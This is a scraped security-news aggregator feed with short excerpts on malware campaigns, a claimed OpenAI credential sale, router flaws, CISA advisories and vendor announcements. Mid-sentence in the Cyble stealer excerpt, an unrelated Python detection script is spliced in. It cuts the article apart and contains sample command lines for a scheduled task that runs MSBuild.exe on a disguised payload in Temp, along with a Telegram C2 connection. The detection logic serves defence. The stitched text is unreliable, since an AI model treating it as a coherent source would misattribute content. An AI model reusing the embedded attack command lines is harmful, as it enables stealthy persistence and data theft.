2025-02-06T21:55:03+00:00 https://www.globalsecuritymag.fr/cyberark-announced-a-new-integration-with-sentinelone-singularity.html www.secnews.physaphae.fr/article.php?IdArticle=8647299 False Threat None 3.0000000000000000
Global Security Mag - Site de news francais Cybersecurity threats are rising, but it is Generations Z and Alpha who introduce risks, not the "elderly" Viewpoints
By Anna Collard, Senior Vice President of Content Strategy and Evangelist at KnowBe4 Africa. Cybersecurity threats are rising, but it is Generations Z and Alpha who introduce risks, not the "elderly" (by Anna Collard). Generation Z employees are much more likely than older employees to use the same password for their work and personal accounts and to ignore important IT updates - Viewpoints]]>
2025-02-06T21:43:00+00:00 https://www.globalsecuritymag.fr/les-menaces-de-cybersecurite-augmentent-mais-ce-sont-les-generations-z-et-alpha.html www.secnews.physaphae.fr/article.php?IdArticle=8647302 False Threat None 3.0000000000000000
Global Security Mag - Site de news francais Quest launches two solutions: Security Guardian Shields Up and Disaster Recovery for Identity Products
Quest leads the charge with unprecedented advances in identity security and ransomware recovery. Redefining ITDR and cyber-resilience standards by disrupting emerging threats and countering attacks via the Quest Unified Cloud Platform - Products]]>
2025-02-06T21:36:12+00:00 https://www.globalsecuritymag.fr/quest-lance-deux-solutions-inedites-sur-le-marche-security-guardian-shields-up.html www.secnews.physaphae.fr/article.php?IdArticle=8647304 False Threat,Cloud None 3.0000000000000000
Global Security Mag - Site de news francais Checkmarx Launches Collaborative Checkmarx Zero Research Hub Product Reviews
Checkmarx Launches Collaborative Checkmarx Zero Research Hub to Share Application Security and Software Supply Chain Threat Intelligence Security researchers and AppSec leaders are invited to explore research and contribute to vulnerability database - Product Reviews]]>
2025-02-06T21:33:26+00:00 https://www.globalsecuritymag.fr/checkmarx-launches-collaborative-checkmarx-zero-research-hub.html www.secnews.physaphae.fr/article.php?IdArticle=8647305 False Vulnerability,Threat None 3.0000000000000000
The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Fake Google Chrome Sites Distribute ValleyRAT Malware via DLL Hijacking Bogus websites advertising Google Chrome have been used to distribute malicious installers for a remote access trojan called ValleyRAT. The malware, first detected in 2023, is attributed to a threat actor tracked as Silver Fox, with prior attack campaigns primarily targeting Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China. "This actor has increasingly targeted key roles]]> 2025-02-06T20:04:00+00:00 https://thehackernews.com/2025/02/fake-google-chrome-sites-distribute.html www.secnews.physaphae.fr/article.php?IdArticle=8647236 False Malware,Threat None 3.0000000000000000 Techworm - News OpenAI Data Breach: Threat Actor Allegedly Claims 20 Million Logins for Sale An anonymous threat actor has allegedly claimed responsibility for a massive data breach affecting OpenAI, offering for sale a database containing the login credentials of 20 million users on the dark web. The unverified claim that surfaced on an underground hacking forum has raised concerns about data security for millions of users relying on OpenAI’s services. The threat actor alleges they have access to a trove of login credentials, including emails and hashed passwords, purportedly sourced from OpenAI\'s user accounts. To promote their discovery, they shared a post with a sample of the data and more being offered for a few dollars. ”When I realized that OpenAI might have to verify accounts in bulk, I understood that my password wouldn\'t stay hidden. I have more than 20 million access codes to OpenAI accounts. If you want, you can contact me – this is a treasure, and Jesus thinks so too,” reads the post by the threat actor on the hacker forum, which was shared by HackManac. OpenAI and independent cybersecurity firms have neither officially confirmed nor denied the threat actor\'s claims. 
If proven true, this breach would be one of the largest data leaks related to OpenAI and could also lead to phishing attacks, unauthorized access, and identity theft. While the authenticity of the breach remains unconfirmed, OpenAI users should remain vigilant and prioritize digital security measures. They are advised to take precautionary measures such as updating OpenAI passwords and avoiding using the same password across multiple sites, enabling two-factor authentication (2FA), and monitoring accounts linked to OpenAI for unusual login attempts or password reset requests. Whether this is a legitimate breach or an elaborate hoax, the incident serves as a stark reminder of the persistent threats in the digital realm. This is a developing story; updates will follow as new information emerges. ]]> 2025-02-06T19:41:51+00:00 https://www.techworm.net/2025/02/openai-data-breach-20-million-logins-sale.html www.secnews.physaphae.fr/article.php?IdArticle=8647221 False Data Breach,Threat None 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Secure Third-party Access Without the Hassle of VPNs Today\'s businesses rely on third-party vendors, contractors, and partners to operate efficiently more than ever. But every external connection introduces a risk-especially when it comes with overly permissive access. If not properly managed, this can become a significant vulnerability. Attackers know this, and they actively exploit these weak points. Take the recent Belsen Group breach […]
2025-02-06T18:44:12+00:00 https://www.netskope.com/blog/secure-third-party-access-without-the-hassle-of-vpns www.secnews.physaphae.fr/article.php?IdArticle=8647269 False Vulnerability,Threat None 2.0000000000000000
SecurityWeek - Security News 1,000 Apps Used in Malicious Campaign Targeting Android Users in India Zimperium warns that threat actors have stolen the information of tens of thousands of Android users in India using over 1,000 malicious applications.
2025-02-06T18:19:36+00:00 https://www.securityweek.com/1000-apps-used-in-malicious-campaign-targeting-android-users-in-india/ www.secnews.physaphae.fr/article.php?IdArticle=8647272 False Threat,Mobile None 2.0000000000000000
Mandiant - Blog Sécu de Mandiant Using capa Rules for Android Malware Detection capa to analyze native ARM ELF files targeting Android. Together, we improved existing and developed new capa rules to detect capabilities observed in Android malware, used the capa rule matches to highlight the highly suspicious code in native files, and prompted Gemini with the highlighted code behaviors for summarization to enhance our review processes for faster decisions. In this blog post, we will describe how we leverage capa behavior-detection capabilities and state-of-the-art Gemini summarization by: Showcasing a malware sample that used various anti-analysis tricks to evade detection Explaining how our existing and new capa rules identify and highlight those behaviors Presenting how Gemini summarizes the highlighted code for security reviews An Illegal Gambling App Under a Music App Façade Google Play Store ensures all published apps conform to local laws and regulations. This includes gambling apps, which are prohibited or require licenses in some areas. Developing and distributing illegal gambling apps in such areas can generate significant illicit profits, which are sometimes associated with organized crime. To bypass Google Play Store\'s security-screening procedures, some gambling apps disguise themselves with harmless façades like music or casual games. These apps only reveal their gambling portals]]> 2025-02-06T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/capa-rules-android-malware-detection/ www.secnews.physaphae.fr/article.php?IdArticle=8647244 False Malware,Tool,Threat,Mobile,Medical,Cloud None 3.0000000000000000 HackRead - Chercher Cyber Ukraine\\'s largest bank PrivatBank Targeted with SmokeLoader malware UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. 
CloudSEK’s research reveals malicious emails…]]> 2025-02-06T13:14:40+00:00 https://hackread.com/ukraine-largest-bank-privatbank-smokeloader-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8647214 False Malware,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Hackers exploit SimpleHelp RMM flaws to deploy Sliver malware Hackers are targeting vulnerable SimpleHelp RMM clients to create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks. [...]]]> 2025-02-06T12:50:54+00:00 https://www.bleepingcomputer.com/news/security/hackers-exploit-simplehelp-rmm-flaws-to-deploy-sliver-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8647262 False Ransomware,Malware,Threat None 2.0000000000000000 Cyble - CyberSecurity Firm CISA Issues Nine Critical Industrial Control Systems Advisories, Addressing Vulnerabilities in Key Equipment Overview The Cybersecurity and Infrastructure Security Agency (CISA) released a series of nine Industrial Control Systems (ICS) advisories on February 4, 2025. These CISA ICS advisories provide essential information about vulnerabilities, security risks, and recommended mitigations affecting various industrial control systems and their components. The advisories, which highlight numerous threats across a variety of devices, emphasize the need for vigilance and prompt action to protect critical infrastructure from potential exploits. The nine advisories address flaws found in systems from notable vendors such as Schneider Electric, Rockwell Automation, and AutomationDirect. These vulnerabilities can allow attackers to disrupt operations, gain unauthorized access, or even execute remote code on compromised devices. Details of the Industrial Control Systems Advisories 1. Western Telematic Inc. 
Vulnerability Advisory Code: ICSA-25-035-01 Vulnerable Products: NPS Seri]]> 2025-02-06T11:44:16+00:00 https://cyble.com/blog/cisa-new-industrial-control-systems-advisories/ www.secnews.physaphae.fr/article.php?IdArticle=8647196 False Vulnerability,Threat,Legislation,Industrial None 3.0000000000000000 Cyble - CyberSecurity Firm Five Eyes Cyber Agencies Share New Security Guidelines for Edge Device Manufacturers Overview The rise in cyber threats targeting edge devices has prompted the cybersecurity agencies of the UK, Australia, Canada, New Zealand, and the United States to release new guidelines aimed at strengthening the security of these critical network components. These recommendations urge manufacturers to integrate robust forensic and logging features by default, making it easier to detect and investigate cyber intrusions. As cybercriminals and state-sponsored actors continue to exploit vulnerabilities in edge devices, organizations must adopt these security measures to mitigate risks. “In the face of a relentless wave of intrusions involving network devices globally, our new guidance sets what we collectively see as the standard required to meet the contemporary threat,” said NCSC Technical Director Ollie Whitehouse. “In doing so we are giving manufacturers and their customers the tools to ensure products not only defend against cyberattacks but also provide the investigative capabilities required post-intrusion.” Understanding Edge Device Security Risks Edge devices, including routers, IoT sensors, security cameras, and smart appliances, act as critical gateways between local networks and the internet. 
These devices are often deployed with minimal security features, making them attractive targets for attackers who exploit vulnerabilities to gain unauthorized access, disrupt services, or maintai]]> 2025-02-06T10:44:52+00:00 https://cyble.com/blog/new-security-guidelines-edge-device-manufacturers/ www.secnews.physaphae.fr/article.php?IdArticle=8647186 False Tool,Vulnerability,Threat,Technical None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC LevelBlue Expands Its Partner Program Globally announced four security services to our partners that easily extend and integrate with LevelBlue USM Anywhere, which includes proactive threat intelligence: LevelBlue Managed Threat Detection and Response; LevelBlue Incident Response Retainer; LevelB]]> 2025-02-06T07:00:00+00:00 https://levelblue.com/blogs/security-essentials/levelblue-expands-its-partner-program-globally www.secnews.physaphae.fr/article.php?IdArticle=8647230 False Vulnerability,Threat,Technical None 3.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Credential-stealing malware surges in 2024 Malware designed to steal credentials from password stores now accounts for 25% of all malware activity, a dramatic threefold increase in this type of threat. This was one of the findings of Picus Security\'s annual cybersecurity analysis, The Red Report 2025. This is the first time that credential theft has ranked among the top 10 techniques [...]]]> 2025-02-06T04:53:11+00:00 https://informationsecuritybuzz.com/credential-stealing-malware-surges-in/ www.secnews.physaphae.fr/article.php?IdArticle=8647149 False Malware,Threat None 3.0000000000000000 Techworm - News NETGEAR Urges Users to Fix Critical Wi-Fi Router Flaws PSV-2023-0039 and PSV-2021-0117, affect multiple Wi-Fi 6 access points (WAX206, WAX214v2, and WAX220) and Nighthawk Pro Gaming router models (XR1000, XR1000v2, and XR500). 
While the PSV-2023-0039 (CVSS score: 9.8) vulnerability could enable unauthenticated threat actors to exploit the flaw for remote code execution (RCE), the PSV-2021-0117 (CVSS score: 9.6) vulnerability could be exploited for authentication bypass in low-complexity attacks without user interaction. The following product models are affected by the unauthenticated RCE security vulnerability PSV-2023-0039 and were patched in the versions given below: XR1000 – fixed in firmware version 1.0.0.74; XR1000v2 – fixed in firmware version 1.1.0.22; XR500 – fixed in firmware version 2.3.2.134. “NETGEAR strongly recommends that you download the latest firmware as soon as possible,” reads the advisory published on Saturday. Further, the following product models are impacted by the authentication bypass security vulnerability PSV-2021-0117, which was patched in the versions shown below: WAX206 – fixed in firmware version 1.0.5.3; WAX220 – fixed in firmware version 1.0.3.5; WAX214v2 – fixed in firmware version 1.0.2.5. You can follow the steps mentioned below to download and install the latest firmware for your NETGEAR product: Visit NETGEAR Support. Enter your model number in the search box, then select your model from the drop-down menu as soon as it appears. If a drop-down menu does not appear, check that you have entered your model number correctly or select a product category to find your product model. Click Downloads. Under Current Versions, choose the download whose title begins with Firmware Version. Click Download. Follow the instructions provided in your product\'s user manual, firmware release notes, or product support page. “The unauthenticated RCE vulnerability remains if you do not complete all recommended steps,” the company warned on Saturday. 
“NETGEAR is n]]> 2025-02-05T20:44:01+00:00 https://www.techworm.net/2025/02/netgear-user-fix-critical-wi-fi-router-flaws.html www.secnews.physaphae.fr/article.php?IdArticle=8647058 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan. "This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector," Seqrite Labs researcher Subhajeet Singha said in a technical report]]> 2025-02-05T18:16:00+00:00 https://thehackernews.com/2025/02/silent-lynx-using-powershell-golang-and.html www.secnews.physaphae.fr/article.php?IdArticle=8647041 False Threat,Technical None 3.0000000000000000 UnderNews - Site de news "pirate" francais Cyber training: Google.org invests 15 million dollars in France, Europe, the Middle East and Africa As cyberattacks multiply and threats keep growing, Europe faces a talent shortage, with more than 800,000 cybersecurity positions still unfilled, 15,000 of them in France alone in 2024 according to the DGSE*. It is therefore essential to contribute to training a skilled workforce. Press release – […] The post Cyber training: Google.org invests 15 million dollars in France, Europe, the Middle East and Africa first appeared on UnderNews.
2025-02-05T14:52:49+00:00 https://www.undernews.fr/reseau-securite/formation-cyber-google-org-investit-15-millions-de-dollars-en-france-en-europe-au-moyen-orient-et-en-afrique.html www.secnews.physaphae.fr/article.php?IdArticle=8647067 False Threat None 3.0000000000000000
Cyble - CyberSecurity Firm CISA Adds New Vulnerabilities to Known Exploited Vulnerabilities Catalog – Critical Updates Required Overview The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four vulnerabilities to its Known Exploited Vulnerabilities Catalog. These vulnerabilities, identified in widely used software products, have been actively exploited by cyber attackers. With these updates, CISA highlights the importance of addressing these flaws promptly to mitigate the risks they pose, particularly to federal enterprises and other critical infrastructure sectors. The newly added vulnerabilities include CVE-2024-45195, CVE-2024-29059, CVE-2018-9276, and CVE-2018-19410, all of which could have severe consequences for the security of affected systems. Detailed List of Vulnerabilities Highlighted in the Known Exploited Vulnerabilities Catalog CVE-2024-45195: Apache OFBiz Forced Browsing Vulnerability The first of the vulnerabilities, CVE-2024-45195, relates to a flaw in Apache OFBiz, an open-source enterprise resource planning (ERP) and e-commerce solution. This vulnerability is a forced browsing issue, where attackers can gain unauthorized access to certain parts of a website by bypassing security restrictions through direct URL requests. The flaw was discovered in Apache OFBiz versions before 18.12.16, and users are advised to upgrade to this version or later to mitigate the threat. The vulnerability can allow attackers to gain unauthorized access to sensitive data by leveraging weak authorization mechanisms. It is listed in the CISA Known Exploited Vulnerabilities Catalog due to active exploitation, with evidence showing malicious actors targeting vulnerable systems to escalate privileges. 
CVE-2024-29059: Microsoft .NET Framework Info 2025-02-05T12:25:39+00:00 https://cyble.com/blog/new-flaws-added-to-known-exploited-vulnerabilities-catalog/ www.secnews.physaphae.fr/article.php?IdArticle=8647026 False Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Sygnia - CyberSecurity Firm The Critical Importance of a Robust Incident Response Plan In today's challenging cyber threat landscape, an effective Incident Response (IR) plan is essential. Discover how preparation and decisive action help organizations minimize risk, maintain business continuity, and build resilience.
2025-02-05T12:19:51+00:00 https://www.sygnia.co/blog/critical-importance-incident-response-plan/ www.secnews.physaphae.fr/article.php?IdArticle=8647019 False Threat None 3.0000000000000000
Cyble - CyberSecurity Firm Stealthy Attack: Dual Injection Undermines Chrome's App-Bound Encryption Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified malware spread via a ZIP file containing an .LNK file disguised as a PDF and an XML project file masquerading as a PNG, packaged to trick users into opening it. The file name suggests the malware is likely targeting organizations in Vietnam, particularly in the telemarketing and sales sectors. The LNK file creates a scheduled task that runs every 15 minutes and executes MSBuild.exe to run the malicious C# code carried in the XML project file. The malware is capable of bypassing Chrome's App-Bound Encryption and deploys a stealer payload that targets sensitive Chrome-related files. It uses a Double Injection technique for fileless execution to evade detection. The malware communicates with the Threat Actor (TA) through the Telegram Web API for command execution, and lets the TA change the Telegram bot ID and chat ID as required, giving them flexibility in controlling their communication channels. Overview Cyble Research & Intelligence Labs (CRIL) discovered malware potentially targeting organizations in Vietnam, especially those in the telemarketing or sales sectors. The initial infection vector is currently unknown. The malware was delivered via a malicious ZIP archive containing an .LNK file disguised as a .PDF and an XML project file masquerading as a .PNG file, designed to deceive users into opening the fake PDF. When executed, the shortcut file copies the XML project file to the Temp directory and runs a command that creates a scheduled task running every 15 minutes. 
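The chain above (scheduled task every 15 minutes, MSBuild.exe handed a "PNG" that is really an XML project with inline C#, and Telegram as the C2 channel) leaves three distinct marks in endpoint telemetry. The following is an added example, not Cyble's code or detection content: three rules run over process-creation and network-connection events. SAMPLE_EVENTS are constructed in a Sysmon-like shape (EventID 1 = process create, 3 = network connect); the field names, user name, task name and file paths are assumptions.

```python
"""Detections for the LNK -> scheduled task -> MSBuild.exe -> Telegram chain
described above, run over process-creation and network-connection telemetry.

Added example, not Cyble's code or detection content. SAMPLE_EVENTS are
constructed in a Sysmon-like shape (EventID 1 = process create, 3 = network
connect); the field names, user name, task name and paths are assumptions.
"""
import re
from typing import Any, Callable, Dict, List, Optional, Tuple

Event = Dict[str, Any]

# Extensions MSBuild is normally asked to build.  Anything else (.png, .pdf,
# .txt ...) handed to MSBuild.exe is an inline-task project in disguise.
PROJECT_EXTS = {".proj", ".csproj", ".vbproj", ".fsproj", ".sln", ".targets", ".props", ".xml"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData|Public)\\", re.I)
TOKEN = re.compile(r'"([^"]*)"|(\S+)')   # split a Windows command line, honouring quotes


def tokens(cmdline: str) -> List[str]:
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ext(path: str) -> str:
    base = path.rsplit("\\", 1)[-1]
    return "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""


def rule_task_runs_msbuild(ev: Event) -> Optional[str]:
    """schtasks.exe /create ... /tr "...MSBuild.exe ..." (the persistence step)."""
    if ev["EventID"] != 1 or image_name(ev["Image"]) != "schtasks.exe":
        return None
    cl = ev["CommandLine"].lower()
    if "/create" in cl and "msbuild" in cl:
        return "scheduled task created whose action runs MSBuild.exe"
    return None


def rule_msbuild_odd_project(ev: Event) -> Optional[str]:
    """MSBuild.exe building a file from a user-writable path or with a non-project extension."""
    if ev["EventID"] != 1 or image_name(ev["Image"]) != "msbuild.exe":
        return None
    for arg in tokens(ev["CommandLine"])[1:]:       # skip the image itself
        if arg[:1] in ("/", "-"):                    # switches such as /nologo, /p:...
            continue
        if ext(arg) not in PROJECT_EXTS or USER_WRITABLE.search(arg):
            return f"MSBuild.exe given a suspicious project file: {arg}"
    return None


def rule_msbuild_telegram(ev: Event) -> Optional[str]:
    """MSBuild.exe has no business talking to the Telegram Bot API."""
    if ev["EventID"] != 3 or image_name(ev["Image"]) != "msbuild.exe":
        return None
    host = str(ev.get("DestinationHostname", "")).lower()
    if host == "telegram.org" or host.endswith(".telegram.org"):
        return f"MSBuild.exe connected to {host} (Telegram API, possible C2)"
    return None


RULES: Tuple[Callable[[Event], Optional[str]], ...] = (
    rule_task_runs_msbuild, rule_msbuild_odd_project, rule_msbuild_telegram,
)


def analyze(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Return (event index, rule name, message) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((i, rule.__name__, msg))
    return hits


MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
TEMP_PNG = r"C:\Users\victim\AppData\Local\Temp\Report.png"   # constructed path

# Constructed events: 0-3 replay the chain, 4 is a legitimate developer build.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "Report.png" %TEMP%'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": f'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "{MSBUILD} {TEMP_PNG}"'},
    {"EventID": 1, "Image": MSBUILD, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f"{MSBUILD} {TEMP_PNG}"},
    {"EventID": 3, "Image": MSBUILD, "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 1, "Image": MSBUILD,
     "CommandLine": f"{MSBUILD} C:\\src\\app\\app.csproj /p:Configuration=Release /nologo"},
]

if __name__ == "__main__":
    for idx, name, msg in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: [{name}] {msg}")
```

The second rule is the one that survives renaming: whatever extension the dropper picks, MSBuild.exe compiling anything out of a user-writable directory is rare on a non-developer host, and on developer hosts the project-extension allowlist keeps normal builds quiet.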
This task launches 2025-02-05T09:40:09+00:00 https://cyble.com/blog/dual-injection-undermines-chromes-encryption/ www.secnews.physaphae.fr/article.php?IdArticle=8646983 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000 The State of Security - Magazine Américain Zero Trust Principles for Critical Infrastructure Security The cyber threat to critical infrastructure has never been greater. The growing sophistication of cybercriminals, deteriorating geopolitical relations, and the convergence of operational technology (OT) and information technology (IT) have created unprecedented risks for critical infrastructure organizations. Fortunately, resources are available to help these organizations protect themselves. In late October 2024, the Cloud Security Alliance (CSA) released Zero Trust Guidance for Critical Infrastructure, a systematic, five-step roadmap to help the world's most important organizations... 2025-02-05T05:30:12+00:00 https://www.tripwire.com/state-of-security/zero-trust-principles-critical-infrastructure-security www.secnews.physaphae.fr/article.php?IdArticle=8647007 False Threat,Cloud None 3.0000000000000000